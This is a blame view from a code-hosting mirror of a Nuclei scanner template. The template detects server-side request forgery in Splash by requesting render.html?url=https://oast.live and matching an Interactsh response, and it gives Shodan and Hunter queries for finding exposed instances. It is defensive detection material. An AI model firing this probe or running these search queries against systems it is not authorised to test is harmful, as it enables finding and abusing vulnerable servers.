daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/splash/splash-render-ssrf.yaml

32 lines
667 B
YAML
Raw Normal View History

splash-ssrf
2023-03-16 11:59:02 +00:00
id: splash-render-ssrf
info:
updates
2023-03-27 06:26:00 +00:00
name: Splash Render - SSRF
splash-ssrf
2023-03-16 11:59:02 +00:00
author: pwnhxl
severity: high
reference:
- https://github.com/scrapinghub/splash
Reference -update
2023-03-17 10:33:40 +00:00
- https://b1ngz.github.io/splash-ssrf-to-get-server-root-privilege/
splash-ssrf
2023-03-16 11:59:02 +00:00
metadata:
Added max request counter of each template
2023-04-28 08:11:21 +00:00
max-request: 1
fixed-formatting
2023-03-16 23:00:41 +00:00
verified: "true"
shodan-query: title:"Splash"
splash-ssrf
2023-03-16 11:59:02 +00:00
hunter-query: web.title="Splash" && header="TwistedWeb"
updates
2023-03-27 06:26:00 +00:00
tags: splash,ssrf,oast,oss
splash-ssrf
2023-03-16 11:59:02 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
fixed-formatting
2023-03-16 23:00:41 +00:00
- method: GET
path:
updates
2023-03-27 06:26:00 +00:00
- "{{BaseURL}}/render.html?url=https://oast.live"
splash-ssrf
2023-03-16 11:59:02 +00:00
matchers-condition: and
matchers:
- type: word
fix
2023-03-21 05:38:50 +00:00
part: body
splash-ssrf
2023-03-16 11:59:02 +00:00
words:
updates
2023-03-27 06:26:00 +00:00
- 'Interactsh Server'
splash-ssrf
2023-03-16 11:59:02 +00:00
- type: status
status:
- 200